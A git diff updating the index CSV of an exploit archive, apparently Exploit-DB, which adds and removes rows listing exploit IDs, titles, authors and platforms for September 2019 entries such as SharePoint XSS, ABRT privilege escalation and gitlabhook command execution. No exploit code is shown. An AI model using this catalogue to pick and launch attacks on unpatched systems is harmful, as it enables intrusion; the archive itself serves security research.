index 732be1925..997980bdb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6563,6 +6563,7 @@ id,file,description,date,author,type,platform,port
 47410,exploits/windows/dos/47410.py,"DeviceViewer 3.12.0.1 - 'creating user' Denial of Service",2019-09-24,x00pwn,dos,windows,
 47414,exploits/windows/dos/47414.txt,"Microsoft Windows cryptoapi - SymCrypt Modular Inverse Algorithm Denial of Service",2019-09-24,"Google Security Research",dos,windows,
 47415,exploits/ios/dos/47415.txt,"iMessage - Decoding NSSharedKeyDictionary Can Read Object Out of Bounds",2019-09-24,"Google Security Research",dos,ios,
+47418,exploits/windows/dos/47418.txt,"SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service",2019-09-25,"Emilio Revelo",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10688,7 +10689,7 @@ id,file,description,date,author,type,platform,port
 47389,exploits/windows/local/47389.txt,"AppXSvc - Privilege Escalation",2019-09-16,"Gabor Seljan",local,windows,
 47394,exploits/windows/local/47394.py,"docPrint Pro 8.0 - SEH Buffer Overflow",2019-09-16,"Connor McGarr",local,windows,
 47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,
-47411,exploits/windows/local/47411.py,"Easy File Sharing Web Server 7.2 - 'New User' Local SEH Overflow",2019-09-24,x00pwn,local,windows,
+47421,exploits/linux/local/47421.rb,"ABRT - sosreport Privilege Escalation (Metasploit)",2019-09-25,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41755,4 +41756,7 @@ id,file,description,date,author,type,platform,port
 47402,exploits/php/webapps/47402.txt,"GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting",2019-09-19,cakes,webapps,php,
 47403,exploits/php/webapps/47403.html,"LayerBB < 1.1.4 - Cross-Site Request Forgery",2019-09-20,0xB9,webapps,php,
 47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,
-47413,exploits/php/webapps/47413.py,"Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection",2019-09-24,"Nassim Asrir",webapps,php,
+47417,exploits/aspx/webapps/47417.txt,"Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistant Cross-Site Scripting",2019-09-25,"Davide Cioccia",webapps,aspx,
+47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,
+47420,exploits/json/webapps/47420.txt,"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution",2019-09-25,"Semen Alexandrovich Lyhin",webapps,json,
+47422,exploits/php/webapps/47422.txt,"YzmCMS 5.3 - 'Host' Header Injection",2019-09-25,"Debashis Pal",webapps,php,